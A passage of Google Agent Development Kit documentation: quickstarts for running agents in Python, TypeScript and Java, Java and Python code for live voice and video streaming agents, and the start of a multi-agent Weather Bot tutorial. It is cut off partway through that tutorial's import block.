your microphone and talk to your agent: Model support for voice/video streaming In order to use voice/video streaming in ADK, you will need to use Gemini models that support the Live API. You can find the **model ID(s)** that supports the Gemini Live API in the documentation: - [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api) - [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) You can then replace the `model` string in `root_agent` in the `agent.py` file you created earlier ([jump to section](#agentpy)). Your code should look something like: ```py root_agent = Agent( name="weather_time_agent", model="replace-me-with-model-id", #e.g. gemini-2.0-flash-live-001 ... ``` Tip When using `adk run` you can inject prompts into the agent to start by piping text to the command like so: ```shell echo "Please start by listing files" | adk run file_listing_agent ``` Run the following command, to chat with your Weather agent. ```text adk run multi_tool_agent ``` To exit, use Cmd/Ctrl+C. `adk api_server` enables you to create a local FastAPI server in a single command, enabling you to test local cURL requests before you deploy your agent. To learn how to use `adk api_server` for testing, refer to the [documentation on using the API server](/adk-docs/runtime/api-server/). Using the terminal, navigate to your agent project directory: ```console my-adk-agent/ <-- navigate to this directory agent.ts .env package.json tsconfig.json ``` There are multiple ways to interact with your agent: Run the following command to launch the **dev UI**. ```shell npx adk web ``` **Step 1:** Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) directly in your browser. **Step 2.** In the top-left corner of the UI, select your agent from the dropdown. The agents are listed by their filenames, so you should select "agent". Troubleshooting If you do not see "agent" in the dropdown menu, make sure you are running `npx adk web` in the directory containing your `agent.ts` file. **Step 3.** Now you can chat with your agent using the textbox: **Step 4.** By using the `Events` tab at the left, you can inspect individual function calls, responses and model responses by clicking on the actions: On the `Events` tab, you can also click the `Trace` button to see the trace logs for each event that shows the latency of each function calls: Run the following command to chat with your agent. ```text npx adk run agent.ts ``` To exit, use Cmd/Ctrl+C. `npx adk api_server` enables you to create a local Express.js server in a single command, enabling you to test local cURL requests before you deploy your agent. To learn how to use `api_server` for testing, refer to the [documentation on testing](/adk-docs/runtime/api-server/). Using the terminal, navigate to the parent directory of your agent project (e.g. using `cd ..`): ```console project_folder/ <-- navigate to this directory ├── pom.xml (or build.gradle) ├── src/ ├── └── main/ │ └── java/ │ └── agents/ │ └── multitool/ │ └── MultiToolAgent.java └── test/ ``` Run the following command from the terminal to launch the Dev UI. **DO NOT change the main class name of the Dev UI server.** terminal ```console mvn exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=src/main/java" \ -Dexec.classpathScope="compile" ``` **Step 1:** Open the URL provided (usually `http://localhost:8080` or `http://127.0.0.1:8080`) directly in your browser. **Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "multi_tool_agent". Troubleshooting If you do not see "multi_tool_agent" in the dropdown menu, make sure you are running the `mvn` command at the location where your Java source code is located (usually `src/main/java`). **Step 3.** Now you can chat with your agent using the textbox: **Step 4.** You can also inspect individual function calls, responses and model responses by clicking on the actions: Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. With Maven, run the `main()` method of your Java class with the following command: terminal ```console mvn compile exec:java -Dexec.mainClass="agents.multitool.MultiToolAgent" ``` With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its `plugins` section: ```groovy plugins { id('java') // other plugins } ``` Then, elsewhere in the build file, at the top-level, create a new task to run the `main()` method of your agent: ```groovy tasks.register('runAgent', JavaExec) { classpath = sourceSets.main.runtimeClasspath mainClass = 'agents.multitool.MultiToolAgent' } ``` Finally, on the command-line, run the following command: ```console gradle runAgent ``` ### 📝 Example prompts to try - What is the weather in New York? - What is the time in New York? - What is the weather in Paris? - What is the time in Paris? ## 🎉 Congratulations! You've successfully created and interacted with your first agent using ADK! ______________________________________________________________________ ## 🛣️ Next steps - **Go to the tutorial**: Learn how to add memory, session, state to your agent: [tutorial](https://google.github.io/adk-docs/tutorials/index.md). - **Delve into advanced configuration:** Explore the [setup](https://google.github.io/adk-docs/get-started/installation/index.md) section for deeper dives into project structure, configuration, and other interfaces. - **Understand Core Concepts:** Learn about [agents concepts](https://google.github.io/adk-docs/agents/index.md). # TypeScript Quickstart for ADK This guide shows you how to get up and running with Agent Development Kit for TypeScript. Before you start, make sure you have the following installed: - Node.js 24.13.0 or later - Node Package Manager (npm) 11.8.0 or later ## Create an agent project Create an empty `my-agent` directory for your project: ```text my-agent/ ``` Create this project structure using the command line ```bash mkdir -p my-agent/ ``` ```console mkdir my-agent ``` ### Configure project and dependencies Use the `npm` tool to install and configure dependencies for your project, including the package file, ADK TypeScript main library, and developer tools. Run the following commands from your `my-agent/` directory to create the `package.json` file and install the project dependencies: ```console cd my-agent/ # initialize a project as an ES module npm init --yes npm pkg set type="module" npm pkg set main="agent.ts" # install ADK libraries npm install @google/adk # install dev tools as a dev dependency npm install -D @google/adk-devtools ``` ### Define the agent code Create the code for a basic agent, including a simple implementation of an ADK [Function Tool](/adk-docs/tools/function-tools/), called `getCurrentTime`. Create an `agent.ts` file in your project directory and add the following code: my-agent/agent.ts ```typescript import {FunctionTool, LlmAgent} from '@google/adk'; import {z} from 'zod'; /* Mock tool implementation */ const getCurrentTime = new FunctionTool({ name: 'get_current_time', description: 'Returns the current time in a specified city.', parameters: z.object({ city: z.string().describe("The name of the city for which to retrieve the current time."), }), execute: ({city}) => { return {status: 'success', report: `The current time in ${city} is 10:30 AM`}; }, }); export const rootAgent = new LlmAgent({ name: 'hello_time_agent', model: 'gemini-2.5-flash', description: 'Tells the current time in a specified city.', instruction: `You are a helpful assistant that tells the current time in a city. Use the 'getCurrentTime' tool for this purpose.`, tools: [getCurrentTime], }); ``` ### Set your API key This project uses the Gemini API, which requires an API key. If you don't already have Gemini API key, create a key in Google AI Studio on the [API Keys](https://aistudio.google.com/app/apikey) page. In a terminal window, write your API key into your `.env` file of your project to set environment variables: Update: my-agent/.env ```bash echo 'GEMINI_API_KEY="YOUR_API_KEY"' > .env ``` Using other AI models with ADK ADK supports the use of many generative AI models. For more information on configuring other models in ADK agents, see [Models & Authentication](/adk-docs/agents/models). ## Run your agent You can run your ADK agent with the `@google/adk-devtools` library as an interactive command-line interface using the `run` command or the ADK web user interface using the `web` command. Both these options allow you to test and interact with your agent. ### Run with command-line interface Run your agent with the ADK TypeScript command-line interface tool using the following command: ```console npx adk run agent.ts ``` ### Run with web interface Run your agent with the ADK web interface using the following command: ```console npx adk web ``` This command starts a web server with a chat interface for your agent. You can access the web interface at (http://localhost:8000). Select your agent at the upper right corner and type a request. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Next: Build your agent Now that you have ADK installed and your first agent running, try building your own agent with our build guides: - [Build your agent](/adk-docs/tutorials/) # Build a streaming agent The Agent Development Kit (ADK) enables real-time, interactive experiences with your AI agents through streaming. This allows for features like live voice conversations, real-time tool use, and continuous updates from your agent. This page provides quickstart examples to get you up and running with streaming capabilities in both Python and Java ADK. - **Python ADK: Streaming agent** ______________________________________________________________________ This example demonstrates how to set up a basic streaming interaction with an agent using Python ADK. It typically involves using the `Runner.run_live()` method and handling asynchronous events. [View Python Streaming Quickstart](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/index.md) - **Java ADK: Streaming agent** ______________________________________________________________________ This example demonstrates how to set up a basic streaming interaction with an agent using Java ADK. It involves using the `Runner.runLive()` method, a `LiveRequestQueue`, and handling the `Flowable` stream. [View Java Streaming Quickstart](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming-java/index.md) # Build a streaming agent with Java This quickstart guide will walk you through the process of creating a basic agent and leveraging ADK Streaming with Java to facilitate low-latency, bidirectional voice interactions. You'll begin by setting up your Java and Maven environment, structuring your project, and defining the necessary dependencies. Following this, you'll create a simple `ScienceTeacherAgent`, test its text-based streaming capabilities using the Dev UI, and then progress to enabling live audio communication, transforming your agent into an interactive voice-driven application. ## **Create your first agent** ### **Prerequisites** - In this getting started guide, you will be programming in Java. Check if **Java** is installed on your machine. Ideally, you should be using Java 17 or more (you can check that by typing **java -version**) - You’ll also be using the **Maven** build tool for Java. So be sure to have [Maven installed](https://maven.apache.org/install.html) on your machine before going further (this is the case for Cloud Top or Cloud Shell, but not necessarily for your laptop). ### **Prepare the project structure** To get started with ADK Java, let’s create a Maven project with the following directory structure: ```text adk-agents/ ├── pom.xml └── src/ └── main/ └── java/ └── agents/ └── ScienceTeacherAgent.java ``` Follow the instructions in [Installation](https://google.github.io/adk-docs/get-started/installation/index.md) page to add `pom.xml` for using the ADK package. Note Feel free to use whichever name you like for the root directory of your project (instead of adk-agents) ### **Running a compilation** Let’s see if Maven is happy with this build, by running a compilation (**mvn compile** command): ```shell $ mvn compile [INFO] Scanning for projects... [INFO] [INFO] --------------------< adk-agents:adk-agents >-------------------- [INFO] Building adk-agents 1.0-SNAPSHOT [INFO] from pom.xml [INFO] --------------------------------[ jar ]--------------------------------- [INFO] [INFO] --- resources:3.3.1:resources (default-resources) @ adk-demo --- [INFO] skip non existing resourceDirectory /home/user/adk-demo/src/main/resources [INFO] [INFO] --- compiler:3.13.0:compile (default-compile) @ adk-demo --- [INFO] Nothing to compile - all classes are up to date. [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------ [INFO] Total time: 1.347 s [INFO] Finished at: 2025-05-06T15:38:08Z [INFO] ------------------------------------------------------------------------ ``` Looks like the project is set up properly for compilation! ### **Creating an agent** Create the **ScienceTeacherAgent.java** file under the `src/main/java/agents/` directory with the following content: ```java package samples.liveaudio; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; /** Science teacher agent. */ public class ScienceTeacherAgent { // Field expected by the Dev UI to load the agent dynamically // (the agent must be initialized at declaration time) public static final BaseAgent ROOT_AGENT = initAgent(); // Please fill in the latest model id that supports live API from // https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/#supported-models public static BaseAgent initAgent() { return LlmAgent.builder() .name("science-app") .description("Science teacher agent") .model("...") // Pleaase fill in the latest model id for live API .instruction(""" You are a helpful science teacher that explains science concepts to kids and teenagers. """) .build(); } } ``` We will use `Dev UI` to run this agent later. For the tool to automatically recognize the agent, its Java class has to comply with the following two rules: - The agent should be stored in a global **public static** variable named **ROOT_AGENT** of type **BaseAgent** and initialized at declaration time. - The agent definition has to be a **static** method so it can be loaded during the class initialization by the dynamic compiling classloader. ## **Run agent with Dev UI** `Dev UI` is a web server where you can quickly run and test your agents for development purpose, without building your own UI application for the agents. ### **Define environment variables** To run the server, you’ll need to export two environment variables: - a Gemini key that you can [get from AI Studio](https://ai.google.dev/gemini-api/docs/api-key), - a variable to specify we’re not using Vertex AI this time. ```shell export GOOGLE_GENAI_USE_VERTEXAI=FALSE export GOOGLE_API_KEY=YOUR_API_KEY ``` ### **Run Dev UI** Run the following command from the terminal to launch the Dev UI. terminal ```console mvn exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=." \ -Dexec.classpathScope="compile" ``` **Step 1:** Open the URL provided (usually `http://localhost:8080` or `http://127.0.0.1:8080`) directly in your browser. **Step 2.** In the top-left corner of the UI, you can select your agent in the dropdown. Select "science-app". Troubleshooting If you do not see "science-app" in the dropdown menu, make sure you are running the `mvn` command from the root of your maven project. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Try Dev UI with voice and video With your favorite browser, navigate to: You should see the following interface: Click the microphone button to enable the voice input, and ask a question `What's the electron?` in voice. You will hear the answer in voice in real-time. To try with video, reload the web browser, click the camera button to enable the video input, and ask questions like "What do you see?". The agent will answer what they see in the video input. ### Caveat - You can not use text chat with the native-audio models. You will see errors when entering text messages on `adk web`. ### Stop the tool Stop the tool by pressing `Ctrl-C` on the console. ## **Run agent with a custom live audio app** Now, let's try audio streaming with the agent and a custom live audio application. ### **A Maven pom.xml build file for Live Audio** Replace your existing pom.xml with the following. ```xml 4.0.0 com.google.adk.samples google-adk-sample-live-audio 0.1.0 Google ADK - Sample - Live Audio A sample application demonstrating a live audio conversation using ADK, runnable via samples.liveaudio.LiveAudioRun. jar UTF-8 17 1.11.0 samples.liveaudio.LiveAudioRun 0.1.0 com.google.cloud libraries-bom 26.53.0 pom import com.google.adk google-adk ${google-adk.version} commons-logging commons-logging 1.2 org.apache.maven.plugins maven-compiler-plugin 3.13.0 ${java.version} ${java.version} true com.google.auto.value auto-value ${auto-value.version} org.codehaus.mojo build-helper-maven-plugin 3.6.0 add-source generate-sources add-source . org.codehaus.mojo exec-maven-plugin 3.2.0 ${exec.mainClass} runtime ``` ### **Creating Live Audio Run tool** Create the **LiveAudioRun.java** file under the `src/main/java/` directory with the following content. This tool runs the agent on it with live audio input and output. ```java package samples.liveaudio; import com.google.adk.agents.LiveRequestQueue; import com.google.adk.agents.RunConfig; import com.google.adk.events.Event; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.common.collect.ImmutableList; import com.google.genai.types.Blob; import com.google.genai.types.Modality; import com.google.genai.types.PrebuiltVoiceConfig; import com.google.genai.types.Content; import com.google.genai.types.Part; import com.google.genai.types.SpeechConfig; import com.google.genai.types.VoiceConfig; import io.reactivex.rxjava3.core.Flowable; import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.net.URL; import javax.sound.sampled.AudioFormat; import javax.sound.sampled.AudioInputStream; import javax.sound.sampled.AudioSystem; import javax.sound.sampled.DataLine; import javax.sound.sampled.LineUnavailableException; import javax.sound.sampled.Mixer; import javax.sound.sampled.SourceDataLine; import javax.sound.sampled.TargetDataLine; import java.util.UUID; import java.util.concurrent.ExecutorService; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; import java.util.concurrent.Executors; import java.util.concurrent.Future; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import agents.ScienceTeacherAgent; /** Main class to demonstrate running the {@link LiveAudioAgent} for a voice conversation. */ public final class LiveAudioRun { private final String userId; private final String sessionId; private final Runner runner; private static final javax.sound.sampled.AudioFormat MIC_AUDIO_FORMAT = new javax.sound.sampled.AudioFormat(16000.0f, 16, 1, true, false); private static final javax.sound.sampled.AudioFormat SPEAKER_AUDIO_FORMAT = new javax.sound.sampled.AudioFormat(24000.0f, 16, 1, true, false); private static final int BUFFER_SIZE = 4096; public LiveAudioRun() { this.userId = "test_user"; String appName = "LiveAudioApp"; this.sessionId = UUID.randomUUID().toString(); InMemorySessionService sessionService = new InMemorySessionService(); this.runner = new Runner(ScienceTeacherAgent.ROOT_AGENT, appName, null, sessionService); ConcurrentMap initialState = new ConcurrentHashMap<>(); var unused = sessionService.createSession(appName, userId, initialState, sessionId).blockingGet(); } private void runConversation() throws Exception { System.out.println("Initializing microphone input and speaker output..."); RunConfig runConfig = RunConfig.builder() .setStreamingMode(RunConfig.StreamingMode.BIDI) .setResponseModalities(ImmutableList.of(new Modality("AUDIO"))) .setSpeechConfig( SpeechConfig.builder() .voiceConfig( VoiceConfig.builder() .prebuiltVoiceConfig( PrebuiltVoiceConfig.builder().voiceName("Aoede").build()) .build()) .languageCode("en-US") .build()) .build(); LiveRequestQueue liveRequestQueue = new LiveRequestQueue(); Flowable eventStream = this.runner.runLive( runner.sessionService().createSession(userId, sessionId).blockingGet(), liveRequestQueue, runConfig); AtomicBoolean isRunning = new AtomicBoolean(true); AtomicBoolean conversationEnded = new AtomicBoolean(false); ExecutorService executorService = Executors.newFixedThreadPool(2); // Task for capturing microphone input Future microphoneTask = executorService.submit(() -> captureAndSendMicrophoneAudio(liveRequestQueue, isRunning)); // Task for processing agent responses and playing audio Future outputTask = executorService.submit( () -> { try { processAudioOutput(eventStream, isRunning, conversationEnded); } catch (Exception e) { System.err.println("Error processing audio output: " + e.getMessage()); e.printStackTrace(); isRunning.set(false); } }); // Wait for user to press Enter to stop the conversation System.out.println("Conversation started. Press Enter to stop..."); System.in.read(); System.out.println("Ending conversation..."); isRunning.set(false); try { // Give some time for ongoing processing to complete microphoneTask.get(2, TimeUnit.SECONDS); outputTask.get(2, TimeUnit.SECONDS); } catch (Exception e) { System.out.println("Stopping tasks..."); } liveRequestQueue.close(); executorService.shutdownNow(); System.out.println("Conversation ended."); } private void captureAndSendMicrophoneAudio( LiveRequestQueue liveRequestQueue, AtomicBoolean isRunning) { TargetDataLine micLine = null; try { DataLine.Info info = new DataLine.Info(TargetDataLine.class, MIC_AUDIO_FORMAT); if (!AudioSystem.isLineSupported(info)) { System.err.println("Microphone line not supported!"); return; } micLine = (TargetDataLine) AudioSystem.getLine(info); micLine.open(MIC_AUDIO_FORMAT); micLine.start(); System.out.println("Microphone initialized. Start speaking..."); byte[] buffer = new byte[BUFFER_SIZE]; int bytesRead; while (isRunning.get()) { bytesRead = micLine.read(buffer, 0, buffer.length); if (bytesRead > 0) { byte[] audioChunk = new byte[bytesRead]; System.arraycopy(buffer, 0, audioChunk, 0, bytesRead); Blob audioBlob = Blob.builder().data(audioChunk).mimeType("audio/pcm").build(); liveRequestQueue.realtime(audioBlob); } } } catch (LineUnavailableException e) { System.err.println("Error accessing microphone: " + e.getMessage()); e.printStackTrace(); } finally { if (micLine != null) { micLine.stop(); micLine.close(); } } } private void processAudioOutput( Flowable eventStream, AtomicBoolean isRunning, AtomicBoolean conversationEnded) { SourceDataLine speakerLine = null; try { DataLine.Info info = new DataLine.Info(SourceDataLine.class, SPEAKER_AUDIO_FORMAT); if (!AudioSystem.isLineSupported(info)) { System.err.println("Speaker line not supported!"); return; } final SourceDataLine finalSpeakerLine = (SourceDataLine) AudioSystem.getLine(info); finalSpeakerLine.open(SPEAKER_AUDIO_FORMAT); finalSpeakerLine.start(); System.out.println("Speaker initialized."); for (Event event : eventStream.blockingIterable()) { if (!isRunning.get()) { break; } AtomicBoolean audioReceived = new AtomicBoolean(false); processEvent(event, audioReceived); event.content().ifPresent(content -> content.parts().ifPresent(parts -> parts.forEach(part -> playAudioData(part, finalSpeakerLine)))); } speakerLine = finalSpeakerLine; // Assign to outer variable for cleanup in finally block } catch (LineUnavailableException e) { System.err.println("Error accessing speaker: " + e.getMessage()); e.printStackTrace(); } finally { if (speakerLine != null) { speakerLine.drain(); speakerLine.stop(); speakerLine.close(); } conversationEnded.set(true); } } private void playAudioData(Part part, SourceDataLine speakerLine) { part.inlineData() .ifPresent( inlineBlob -> inlineBlob .data() .ifPresent( audioBytes -> { if (audioBytes.length > 0) { System.out.printf( "Playing audio (%s): %d bytes%n", inlineBlob.mimeType(), audioBytes.length); speakerLine.write(audioBytes, 0, audioBytes.length); } })); } private void processEvent(Event event, java.util.concurrent.atomic.AtomicBoolean audioReceived) { event .content() .ifPresent( content -> content .parts() .ifPresent(parts -> parts.forEach(part -> logReceivedAudioData(part, audioReceived)))); } private void logReceivedAudioData(Part part, AtomicBoolean audioReceived) { part.inlineData() .ifPresent( inlineBlob -> inlineBlob .data() .ifPresent( audioBytes -> { if (audioBytes.length > 0) { System.out.printf( " Audio (%s): received %d bytes.%n", inlineBlob.mimeType(), audioBytes.length); audioReceived.set(true); } else { System.out.printf( " Audio (%s): received empty audio data.%n", inlineBlob.mimeType()); } })); } public static void main(String[] args) throws Exception { LiveAudioRun liveAudioRun = new LiveAudioRun(); liveAudioRun.runConversation(); System.out.println("Exiting Live Audio Run."); } } ``` ### **Run the Live Audio Run tool** To run Live Audio Run tool, use the following command on the `adk-agents` directory: ```text mvn compile exec:java ``` Then you should see: ```text $ mvn compile exec:java ... Initializing microphone input and speaker output... Conversation started. Press Enter to stop... Speaker initialized. Microphone initialized. Start speaking... ``` With this message, the tool is ready to take voice input. Talk to the agent with a question like `What's the electron?`. Caution When you observe the agent keep speaking by itself and doesn't stop, try using earphones to suppress the echoing. ## **Summary** Streaming for ADK enables developers to create agents capable of low-latency, bidirectional voice and video communication, enhancing interactive experiences. The article demonstrates that text streaming is a built-in feature of ADK Agents, requiring no additional specific code, while also showcasing how to implement live audio conversations for real-time voice interaction with an agent. This allows for more natural and dynamic communication, as users can speak to and hear from the agent seamlessly. # Build a streaming agent with Python With this quickstart, you'll learn to create a simple agent and use ADK Streaming to enable voice and video communication with it that is low-latency and bidirectional. We will install ADK, set up a basic "Google Search" agent, try running the agent with Streaming with `adk web` tool, and then explain how to build a simple asynchronous web app by yourself using ADK Streaming and [FastAPI](https://fastapi.tiangolo.com/). **Note:** This guide assumes you have experience using a terminal in Windows, Mac, and Linux environments. ## Supported models for voice/video streaming In order to use voice/video streaming in ADK, you will need to use Gemini models that support the Live API. You can find the **model ID(s)** that supports the Gemini Live API in the documentation: - [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api) - [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ## 1. Setup Environment & Install ADK Create & Activate Virtual Environment (Recommended): ```bash # Create python -m venv .venv # Activate (each new terminal) # macOS/Linux: source .venv/bin/activate # Windows CMD: .venv\Scripts\activate.bat # Windows PowerShell: .venv\Scripts\Activate.ps1 ``` Install ADK: ```bash pip install google-adk ``` ## 2. Project Structure Create the following folder structure with empty files: ```console adk-streaming/ # Project folder └── app/ # the web app folder ├── .env # Gemini API key └── google_search_agent/ # Agent folder ├── __init__.py # Python package └── agent.py # Agent definition ``` ### agent.py Copy-paste the following code block into the `agent.py` file. For `model`, please double check the model ID as described earlier in the [Models section](#supported-models). ```py from google.adk.agents import Agent from google.adk.tools import google_search # Import the tool root_agent = Agent( # A unique name for the agent. name="basic_search_agent", # The Large Language Model (LLM) that agent will use. # Please fill in the latest model id that supports live from # https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/#supported-models model="...", # A short description of the agent's purpose. description="Agent to answer questions using Google Search.", # Instructions to set the agent's behavior. instruction="You are an expert researcher. You always stick to the facts.", # Add google_search tool to perform grounding with Google search. tools=[google_search] ) ``` `agent.py` is where all your agent(s)' logic will be stored, and you must have a `root_agent` defined. Notice how easily you integrated [grounding with Google Search](https://ai.google.dev/gemini-api/docs/grounding?lang=python#configure-search) capabilities. The `Agent` class and the `google_search` tool handle the complex interactions with the LLM and grounding with the search API, allowing you to focus on the agent's *purpose* and *behavior*. Copy-paste the following code block to `__init__.py` file. __init__.py ```py from . import agent ``` ## 3. Set up the platform To run the agent, choose a platform from either Google AI Studio or Google Cloud Vertex AI: 1. Get an API key from [Google AI Studio](https://aistudio.google.com/apikey). 1. Open the **`.env`** file located inside (`app/`) and copy-paste the following code. .env ```text GOOGLE_GENAI_USE_VERTEXAI=FALSE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_API_KEY_HERE ``` 1. Replace `PASTE_YOUR_ACTUAL_API_KEY_HERE` with your actual `API KEY`. 1. You need an existing [Google Cloud](https://cloud.google.com/?e=48754805&hl=en) account and a project. - Set up a [Google Cloud project](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-gcp) - Set up the [gcloud CLI](https://cloud.google.com/vertex-ai/generative-ai/docs/start/quickstarts/quickstart-multimodal#setup-local) - Authenticate to Google Cloud, from the terminal by running `gcloud auth login`. - [Enable the Vertex AI API](https://console.cloud.google.com/flows/enableapi?apiid=aiplatform.googleapis.com). 1. Open the **`.env`** file located inside (`app/`). Copy-paste the following code and update the project ID and location. .env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_CLOUD_PROJECT=PASTE_YOUR_ACTUAL_PROJECT_ID GOOGLE_CLOUD_LOCATION=us-central1 ``` ## 4. Try the agent with `adk web` Now it's ready to try the agent. Run the following command to launch the **dev UI**. First, make sure to set the current directory to `app`: ```shell cd app ``` Also, set `SSL_CERT_FILE` variable with the following command. This is required for the voice and video tests later. ```bash export SSL_CERT_FILE=$(python -m certifi) ``` ```powershell $env:SSL_CERT_FILE = (python -m certifi) ``` Then, run the dev UI: ```shell adk web ``` Note for Windows users When hitting the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. Open the URL provided (usually `http://localhost:8000` or `http://127.0.0.1:8000`) **directly in your browser**. This connection stays entirely on your local machine. Select `google_search_agent`. ### Try with voice and video To try with voice, reload the web browser, click the microphone button to enable the voice input, and ask the the following questions in voice. The agent will use the google_search tool to get the latest information to answer those questions. You will hear the answer in voice in real-time. - What is the weather in New York? - What is the time in New York? - What is the weather in Paris? - What is the time in Paris? To try with video, reload the web browser, click the camera button to enable the video input, and ask questions like "What do you see?". The agent will answer what they see in the video input. #### Caveat - You can not use text chat with the native-audio models. You will see errors when entering text messages on `adk web`. ### Stop the tool Stop `adk web` by pressing `Ctrl-C` on the console. ### Note on ADK Streaming The following features will be supported in the future versions of the ADK Streaming: Callback, LongRunningTool, ExampleTool, and Shell agent (e.g. SequentialAgent). Congratulations! You've successfully created and interacted with your first Streaming agent using ADK! ## Next steps: build custom streaming app The [Bidi-streaming development guide series](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) gives an overview of the server and client code for a custom asynchronous web app built with ADK Streaming, enabling real-time, bidirectional audio and text communication. # Build your agent with ADK Get started with the Agent Development Kit (ADK) through our collection of practical guides. These tutorials are designed in a simple, progressive, step-by-step fashion, introducing you to different ADK features and capabilities. This approach allows you to learn and build incrementally – starting with foundational concepts and gradually tackling more advanced agent development techniques. You'll explore how to apply these features effectively across various use cases, equipping you to build your own sophisticated agentic applications with ADK. Explore our collection below and happy building: - **Multi-tool agent** ______________________________________________________________________ Create a workflow that uses multiple tools. [Build a multi-tool agent](https://google.github.io/adk-docs/get-started/quickstart/index.md) - **Agent team** ______________________________________________________________________ Build an multi-agent workflow including agent delegation, session management, and safety callbacks. [Build an agent team](https://google.github.io/adk-docs/tutorials/agent-team/index.md) - **Streaming agent** ______________________________________________________________________ Create an agent for handling streamed content. [Build a streaming agent](https://google.github.io/adk-docs/get-started/streaming/index.md) - **Discover sample agents** ______________________________________________________________________ Discover sample agents for retail, travel, customer service, and more! [Discover adk-samples](https://github.com/google/adk-samples) # Build Your First Intelligent Agent Team: A Progressive Weather Bot with ADK Share to: This tutorial extends from the [Quickstart example](https://google.github.io/adk-docs/get-started/quickstart/) for [Agent Development Kit](https://google.github.io/adk-docs/get-started/). Now, you're ready to dive deeper and construct a more sophisticated, **multi-agent system**. We'll embark on building a **Weather Bot agent team**, progressively layering advanced features onto a simple foundation. Starting with a single agent that can look up weather, we will incrementally add capabilities like: - Leveraging different AI models (Gemini, GPT, Claude). - Designing specialized sub-agents for distinct tasks (like greetings and farewells). - Enabling intelligent delegation between agents. - Giving agents memory using persistent session state. - Implementing crucial safety guardrails using callbacks. **Why a Weather Bot Team?** This use case, while seemingly simple, provides a practical and relatable canvas to explore core ADK concepts essential for building complex, real-world agentic applications. You'll learn how to structure interactions, manage state, ensure safety, and orchestrate multiple AI "brains" working together. **What is ADK Again?** As a reminder, ADK is a Python framework designed to streamline the development of applications powered by Large Language Models (LLMs). It offers robust building blocks for creating agents that can reason, plan, utilize tools, interact dynamically with users, and collaborate effectively within a team. **In this advanced tutorial, you will master:** - ✅ **Tool Definition & Usage:** Crafting Python functions (`tools`) that grant agents specific abilities (like fetching data) and instructing agents on how to use them effectively. - ✅ **Multi-LLM Flexibility:** Configuring agents to utilize various leading LLMs (Gemini, GPT-4o, Claude Sonnet) via LiteLLM integration, allowing you to choose the best model for each task. - ✅ **Agent Delegation & Collaboration:** Designing specialized sub-agents and enabling automatic routing (`auto flow`) of user requests to the most appropriate agent within a team. - ✅ **Session State for Memory:** Utilizing `Session State` and `ToolContext` to enable agents to remember information across conversational turns, leading to more contextual interactions. - ✅ **Safety Guardrails with Callbacks:** Implementing `before_model_callback` and `before_tool_callback` to inspect, modify, or block requests/tool usage based on predefined rules, enhancing application safety and control. **End State Expectation:** By completing this tutorial, you will have built a functional multi-agent Weather Bot system. This system will not only provide weather information but also handle conversational niceties, remember the last city checked, and operate within defined safety boundaries, all orchestrated using ADK. **Prerequisites:** - ✅ **Solid understanding of Python programming.** - ✅ **Familiarity with Large Language Models (LLMs), APIs, and the concept of agents.** - ❗ **Crucially: Completion of the ADK Quickstart tutorial(s) or equivalent foundational knowledge of ADK basics (Agent, Runner, SessionService, basic Tool usage).** This tutorial builds directly upon those concepts. - ✅ **API Keys** for the LLMs you intend to use (e.g., Google AI Studio for Gemini, OpenAI Platform, Anthropic Console). ______________________________________________________________________ **Note on Execution Environment:** This tutorial is structured for interactive notebook environments like Google Colab, Colab Enterprise, or Jupyter notebooks. Please keep the following in mind: - **Running Async Code:** Notebook environments handle asynchronous code differently. You'll see examples using `await` (suitable when an event loop is already running, common in notebooks) or `asyncio.run()` (often needed when running as a standalone `.py` script or in specific notebook setups). The code blocks provide guidance for both scenarios. - **Manual Runner/Session Setup:** The steps involve explicitly creating `Runner` and `SessionService` instances. This approach is shown because it gives you fine-grained control over the agent's execution lifecycle, session management, and state persistence. **Alternative: Using ADK's Built-in Tools (Web UI / CLI / API Server)** If you prefer a setup that handles the runner and session management automatically using ADK's standard tools, you can find the equivalent code structured for that purpose [here](https://github.com/google/adk-docs/tree/main/examples/python/tutorial/agent_team/adk-tutorial). That version is designed to be run directly with commands like `adk web` (for a web UI), `adk run` (for CLI interaction), or `adk api_server` (to expose an API). Please follow the `README.md` instructions provided in that alternative resource. ______________________________________________________________________ **Ready to build your agent team? Let's dive in!** > **Note:** This tutorial works with adk version 1.0.0 and above ```python # @title Step 0: Setup and Installation # Install ADK and LiteLLM for multi-model support !pip install google-adk -q !pip install litellm -q print("Installation complete.") ``` ```python # @title Import necessary libraries import os import asyncio from google.adk.agents import Agent from google.adk.models.lite_llm import LiteLlm # For multi-model support from google.adk.sessions import InMemorySessionService from google.adk.runners import 